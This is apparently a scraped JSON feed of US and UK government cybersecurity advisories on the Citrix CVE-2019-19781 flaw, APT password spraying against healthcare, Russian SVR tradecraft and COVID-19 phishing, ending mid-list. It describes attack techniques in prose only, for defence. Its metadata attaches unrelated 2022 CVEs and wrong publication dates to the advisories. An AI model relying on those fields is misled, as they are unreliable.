system.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n### Mitigations\n\nThe resources provided include steps for standalone, HA pairs, and clustered Citrix instances.\n\n * Use Citrix's tool to check for the vulnerability. \n * <https://support.citrix.com/article/CTX269180>\n * Use an open-source utility to check for the vulnerability or previous device compromise. \n * <https://github.com/cisagov/check-cve-2019-19781>_ _\n * <https://github.com/x1sec/citrixmash_scanner>\n * <https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2>\n * Follow instructions from Citrix to mitigate the vulnerability. \n * <https://support.citrix.com/article/CTX267679>\n * <https://support.citrix.com/article/CTX267027>\n * Upgrade firmware to a patched version. \n * Subscribe to Citrix Alerts for firmware updates. \n * <https://support.citrix.com/user/alerts>\n * Patch devices to the most current version. \n * <https://www.citrix.com/downloads/citrix-gateway/>\n * <https://www.citrix.com/downloads/citrix-adc/>\n * <https://www.citrix.com/downloads/citrix-sd-wan/>\n\nConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.\n\nCISA's Tip [Handling Destructive Malware](<https://www.us-cert.gov/ncas/tips/ST13-003>) provides additional information, including best practices and incident response strategies.\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] GitHub web_citrix_cve_2019_19781_exploit.yml ](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\n[[3] TrustedSec blog: NetScaler Remote Code Execution Forensics](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n[[4] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[5] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[6] IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>)\n\n[[7] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[8] CISA Vulnerability Test Tool](<https://github.com/cisagov/check-cve-2019-19781>)\n\n### Revisions\n\nJanuary 31, 2020: Initial Version|February 7, 2020: Added link to the Australian Cyber Security Centre script\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Detecting Citrix CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-05-21T12:00:00", "id": "AA20-031A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-031a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:42:14", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nCISA and NCSC continue to see indications that advanced persistent threat (APT) groups are exploiting the Coronavirus Disease 2019 (COVID-19) pandemic as part of their cyber operations. This joint alert highlights ongoing activity by APT groups against organizations involved in both national and international COVID-19 responses. It describes some of the methods these actors are using to target organizations and provides mitigation advice.\n\nThe joint CISA-NCSC [Alert: (AA20-099A) COVID-19 Exploited by Malicious Cyber Actors](<https://www.us-cert.gov/ncas/alerts/aa20-099a>) from April 8, 2020, previously detailed the exploitation of the COVID-19 pandemic by cybercriminals and APT groups. This joint CISA-NCSC Alert provides an update to ongoing malicious cyber activity relating to COVID-19. For a graphical summary of CISA\u2019s joint COVID-19 Alerts with NCSC, see the following [guide](<https://cisa.gov/sites/default/files/publications/Joint_CISA_UK_Tip-COVID-19_Cyber_Threat_Exploitation_S508C.pdf>).\n\n### COVID-19-related targeting\n\nAPT actors are actively targeting organizations involved in both national and international COVID-19 responses. These organizations include healthcare bodies, pharmaceutical companies, academia, medical research organizations, and local governments.\n\nAPT actors frequently target organizations in order to collect bulk personal information, intellectual property, and intelligence that aligns with national priorities.\n\nThe pandemic has likely raised additional interest for APT actors to gather information related to COVID-19. For example, actors may seek to obtain intelligence on national and international healthcare policy or acquire sensitive data on COVID-19-related research.\n\n### Targeting of pharmaceutical and research organizations\n\nCISA and NCSC are currently investigating a number of incidents in which threat actors are targeting pharmaceutical companies, medical research organizations, and universities. APT groups frequently target such organizations in order to steal sensitive research data and intellectual property for commercial and state benefit. Organizations involved in COVID-19-related research are attractive targets for APT actors looking to obtain information for their domestic research efforts into COVID-19-related medicine.\n\nThese organizations\u2019 global reach and international supply chains increase exposure to malicious cyber actors. Actors view supply chains as a weak link that they can exploit to obtain access to better-protected targets. Many supply chain elements have also been affected by the shift to remote working and the new vulnerabilities that have resulted.\n\nRecently CISA and NCSC have seen APT actors scanning the external websites of targeted companies and looking for vulnerabilities in unpatched software. Actors are known to take advantage of Citrix vulnerability CVE-2019-19781[[1]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>),[[2]](<https://www.ncsc.gov.uk/news/citrix-alert>) and vulnerabilities in virtual private network (VPN) products from Pulse Secure, Fortinet, and Palo Alto.[[3]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>),[[4]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### COVID-19-related password spraying activity\n\nCISA and NCSC are actively investigating large-scale password spraying campaigns conducted by APT groups. These actors are using this type of attack to target healthcare entities in a number of countries\u2014including the United Kingdom and the United States\u2014as well as international healthcare organizations.\n\nPreviously, APT groups have used password spraying to target a range of organizations and companies across sectors\u2014including government, emergency services, law enforcement, academia and research organizations, financial institutions, and telecommunications and retail companies.\n\n### Technical Details\n\n[Password spraying](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>) is a commonly used style of brute force attack in which the attacker tries a single and commonly used password against many accounts before moving on to try a second password, and so on. This technique allows the attacker to remain undetected by avoiding rapid or frequent account lockouts. These attacks are successful because, for any given large set of users, there will likely be some with common passwords.\n\nMalicious cyber actors, including APT groups, collate names from various online sources that provide organizational details and use this information to identify possible accounts for targeted institutions. The actors will then \u201cspray\u201d the identified accounts with lists of commonly used passwords.\n\nOnce the malicious cyber actor compromises a single account, they will use it to access other accounts where the credentials are reused. Additionally, the actor could attempt to move laterally across the network to steal additional data and implement further attacks against other accounts within the network.\n\nIn previous incidents investigated by CISA and NCSC, malicious cyber actors used password spraying to compromise email accounts in an organization and then, in turn, used these accounts to download the victim organization\u2019s Global Address List (GAL). The actors then used the GAL to password spray further accounts.\n\nNCSC has previously provided [examples of frequently found passwords](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>), which attackers are known to use in password spray attacks to attempt to gain access to corporate accounts and networks. In these attacks, malicious cyber actors often use passwords based on the month of the year, seasons, and the name of the company or organization.\n\nCISA and NCSC continue to investigate activity linked to large-scale password spraying campaigns. APT actors will continue to exploit COVID-19 as they seek to answer additional intelligence questions relating to the pandemic. CISA and NCSC advise organizations to follow the mitigation advice below in view of this heightened activity.\n\n### Mitigations\n\nCISA and NCSC have previously published information for organizations on password spraying and improving password policy. Putting this into practice will significantly reduce the chance of compromise from this kind of attack.\n\n * [CISA alert on password spraying attacks](<https://www.us-cert.gov/ncas/alerts/TA18-086A>)\n * [CISA guidance on choosing and protecting passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>)\n * [CISA guidance on supplementing passwords](<https://www.us-cert.gov/ncas/tips/ST05-012>)\n * [NCSC guidance on password spraying attacks](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>)\n * [NCSC guidance on password administration for system owners](<https://www.ncsc.gov.uk/collection/passwords>)\n * [NCSC guidance on password deny lists](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>)\n\nCISA\u2019s [Cyber Essentials](<https://www.cisa.gov/sites/default/files/publications/19_1106_cisa_CISA_Cyber_Essentials_S508C_0.pdf>) for small organizations provides guiding principles for leaders to develop a culture of security and specific actions for IT professionals to put that culture into action. Additionally, the UK government\u2019s [Cyber Aware](<https://www.ncsc.gov.uk/cyberaware/home>) campaign provides useful advice for individuals on how to stay secure online during the coronavirus pandemic. This includes advice on protecting passwords, accounts, and devices.\n\nA number of other mitigations will be of use in defending against the campaigns detailed in this report:\n\n * **Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and configurations. **See CISA\u2019s [guidance on enterprise VPN security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>) and NCSC [guidance on virtual private networks](<https://www.ncsc.gov.uk/collection/mobile-device-guidance/virtual-private-networks>) for more information.\n * **Use multi-factor authentication to reduce the impact of password compromises.** See the U.S. National Cybersecurity Awareness Month\u2019s [how-to guide for multi-factor authentication](<https://niccs.us-cert.gov/sites/default/files/documents/pdf/ncsam_howtoguidemfa_508.pdf?trackDocs=ncsam_howtoguidemfa_508.pdf>). Also see NCSC guidance on [multi-factor authentication services](<https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services>) and [setting up two factor authentication](<https://www.ncsc.gov.uk/guidance/setting-two-factor-authentication-2fa>).\n * **Protect the management interfaces of your critical operational systems.** In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets. See [the NCSC blog on protecting management interfaces](<https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces>).\n * **Set up a security monitoring capability **so you are collecting the data that will be needed to analyze network intrusions. See the [NCSC introduction to logging security purposes](<https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes>).\n * **Review and refresh your incident management processes.** See [the NCSC guidance on incident management](<https://www.ncsc.gov.uk/guidance/10-steps-incident-management>).\n * **Use modern systems and software.** These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See [the NCSC guidance on obsolete platform security](<https://www.ncsc.gov.uk/guidance/obsolete-platforms-security>).\n * **Further information: **Invest in preventing malware-based attacks across various scenarios. See CISA\u2019s guidance on [ransomware](<https://www.us-cert.gov/Ransomware>) and [protecting against malicious code](<https://www.us-cert.gov/ncas/tips/ST18-271>). Also see [the NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>).\n\n### Contact Information\n\nCISA encourages U.S. users and organizations to contribute any additional information that may relate to this threat by emailing [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" ).\n\nThe NCSC encourages UK organizations to report any suspicious activity to the NCSC via their website: <https://report.ncsc.gov.uk/>.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[2] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[3] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[4] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### Revisions\n\nMay 5, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-25T12:00:00", "type": "ics", "title": "APT Groups Target Healthcare and Essential Services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-01-25T12:00:00", "id": "AA20-126A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-126a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:15:09", "description": "### Summary\n\nThe Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors\u2014also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium\u2014will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled \u201cRussian SVR Targets U.S. and Allied Networks,\u201d released on April 15, 2021.\n\nThe FBI and DHS are providing information on the SVR\u2019s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.\n\nClick here for a PDF version of this report.\n\n### Threat Overview\n\nSVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors\u2019 ability to move within victim environments undetected.\n\nBeginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.\n\n### Technical Details\n\n### SVR Cyber Operations Tactics, Techniques, and Procedures\n\n### Password Spraying\n\nIn one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a \u201clow and slow\u201d manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.\n\nThe organization unintentionally exempted the compromised administrator\u2019s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.\n\nThe actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple\u2019s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.\n\nWhile the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.\n\nDuring the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. \n\n#### _**Recommendations**_\n\nTo defend from this technique, the FBI and DHS recommend network operators to follow best practices for configuring access to cloud computing environments, including:\n\n * Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations.\n * Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.\n * Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.\n * Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.\n * Regularly review the organization\u2019s password management program.\n * Ensure the organization\u2019s information technology (IT) support team has well-documented standard operating procedures for password resets of user account lockouts.\n * Maintain a regular cadence of security awareness training for all company employees.\n\n### Leveraging Zero-Day Vulnerability\n\nIn a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.\n\nThe actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.\n\nFollowing initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.\n\n#### **_Recommendations_**\n\nTo defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:\n\n * Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP.\n * Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.\n * Require use of multi-factor authentication to access internal systems.\n * Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization\u2019s security baseline and incorporate into enterprise monitoring tools.\n\n### WELLMESS Malware\n\nIn 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI\u2019s investigation revealed that following initial compromise of a network\u2014normally through an unpatched, publicly-known vulnerability\u2014the actors deployed WELLMESS. Once on the network, the actors targeted each organization\u2019s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion have been previously released and are referenced in the \u2018Resources\u2019 section of this document.\n\n### Tradecraft Similarities of SolarWinds-enabled Intrusions\n\nDuring the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR\u2019s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR\u2019s historic tradecraft.\n\nThe FBI\u2019s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.\n\n#### **_Recommendations_**\n\nAlthough defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:\n\n * Auditing log files to identify attempts to access privileged certificates and creation of fake identify providers.\n * Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.\n * Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.\n * Using available public resources to identify credential abuse within cloud environments.\n * Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.\n\nWhile few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly \u201czero trust\u201d architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.\n\n### General Tradecraft Observations\n\nSVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.\n\nThe FBI also notes SVR cyber operators have used open source or commercially available tools continuously, including Mimikatz\u2014an open source credential-dumping too\u2014and Cobalt Strike\u2014a commercially available exploitation tool.\n\n### Mitigations\n\nThe FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.\n\n### Resources\n\n * NSA, CISA, FBI [Joint Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n * CISA: [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise ](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * CISA [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * FBI, CISA, ODNI, NSA Joint Statement: [Joint Statement by the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence (ODNI), and the National Security Agency](<https://www.odni.gov/index.php/newsroom/press-releases/press-releases-2021/item/2176-joint-statement-by-the-federal-bureau-of-investigation-fbi-the-cybersecurity-and-infrastructure-security-agency-cisa-the-office-of-the-director-of-national-intelligence-odni-and-the-national-security-agency-nsa>)\n * CISA Alert [AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [CISA Insights: What Every Leader Needs to Know about the Ongoing APT Cyber Activity](<https://www.cisa.gov/sites/default/files/publications/CISA Insights - What Every Leader Needs to Know About the Ongoing APT Cyber Activity - FINAL_508.pdf>)\n * FBI, CISA [Joint Cybersecurity Advisory: Advanced Persistent Threat Actors Targeting U.S. Think Tanks](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf>)\n * CISA: [Malicious Activity Targeting COVID-19 Research, Vaccine Development ](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/16/malicious-activity-targeting-covid-19-research-vaccine-development>)\n * NCSC, CSE, NSA, CISA Advisory: [APT 29 targets COVID-19 vaccine development](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n### Revisions\n\nApril 26, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T12:00:00", "type": "ics", "title": "Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-04-26T12:00:00", "id": "AA21-116A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-116a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:44:44", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nThis alert provides information on exploitation by cybercriminal and advanced persistent threat (APT) groups of the current coronavirus disease 2019 (COVID-19) global pandemic. It includes a non-exhaustive list of indicators of compromise (IOCs) for detection as well as mitigation advice.\n\nBoth CISA and NCSC are seeing a growing use of COVID-19-related themes by malicious cyber actors. At the same time, the surge in teleworking has increased the use of potentially vulnerable services, such as virtual private networks (VPNs), amplifying the threat to individuals and organizations.\n\nAPT groups and cybercriminals are targeting individuals, small and medium enterprises, and large organizations with COVID-19-related scams and phishing emails. This alert provides an overview of COVID-19-related malicious cyber activity and offers practical advice that individuals and organizations can follow to reduce the risk of being impacted. The IOCs provided within the accompanying .csv and .stix files of this alert are based on analysis from CISA, NCSC, and industry.\n\n**Note: **this is a fast-moving situation and this alert does not seek to catalogue all COVID-19-related malicious cyber activity. Individuals and organizations should remain alert to increased activity relating to COVID-19 and take proactive steps to protect themselves.\n\n### Technical Details\n\n## Summary of Attacks\n\nAPT groups are using the COVID-19 pandemic as part of their cyber operations. These cyber threat actors will often masquerade as trusted entities. Their activity includes using coronavirus-themed phishing messages or malicious applications, often masquerading as trusted entities that may have been previously compromised. Their goals and targets are consistent with long-standing priorities such as espionage and \u201chack-and-leak\u201d operations.\n\nCybercriminals are using the pandemic for commercial gain, deploying a variety of ransomware and other malware.\n\nBoth APT groups and cybercriminals are likely to continue to exploit the COVID-19 pandemic over the coming weeks and months. Threats observed include:\n\n * Phishing, using the subject of coronavirus or COVID-19 as a lure,\n * Malware distribution, using coronavirus- or COVID-19- themed lures,\n * Registration of new domain names containing wording related to coronavirus or COVID-19, and\n * Attacks against newly\u2014and often rapidly\u2014deployed remote access and teleworking infrastructure.\n\nMalicious cyber actors rely on basic social engineering methods to entice a user to carry out a specific action. These actors are taking advantage of human traits such as curiosity and concern around the coronavirus pandemic in order to persuade potential victims to:\n\n * Click on a link or download an app that may lead to a phishing website, or the downloading of malware, including ransomware. \n * For example, a malicious Android app purports to provide a real-time coronavirus outbreak tracker but instead attempts to trick the user into providing administrative access to install \"CovidLock\" ransomware on their device.[[1]](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n * Open a file (such as an email attachment) that contains malware. \n * For example, email subject lines contain COVID-19-related phrases such as \u201cCoronavirus Update\u201d or \u201c2019-nCov: Coronavirus outbreak in your city (Emergency)\u201d\n\nTo create the impression of authenticity, malicious cyber actors may spoof sender information in an email to make it appear to come from a trustworthy source, such as the World Health Organization (WHO) or an individual with \u201cDr.\u201d in their title. In several examples, actors send phishing emails that contain links to a fake email login page. Other emails purport to be from an organization\u2019s human resources (HR) department and advise the employee to open the attachment.\n\nMalicious file attachments containing malware payloads may be named with coronavirus- or COVID-19-related themes, such as \u201cPresident discusses budget savings due to coronavirus with Cabinet.rtf.\u201d\n\n**Note: **a non-exhaustive list of IOCs related to this activity is provided within the accompanying .csv and .stix files of this alert.\n\n## Phishing\n\nCISA and NCSC have both observed a large volume of phishing campaigns that use the social engineering techniques described above.\n\nExamples of phishing email subject lines include:\n\n * 2020 Coronavirus Updates,\n * Coronavirus Updates,\n * 2019-nCov: New confirmed cases in your City, and\n * 2019-nCov: 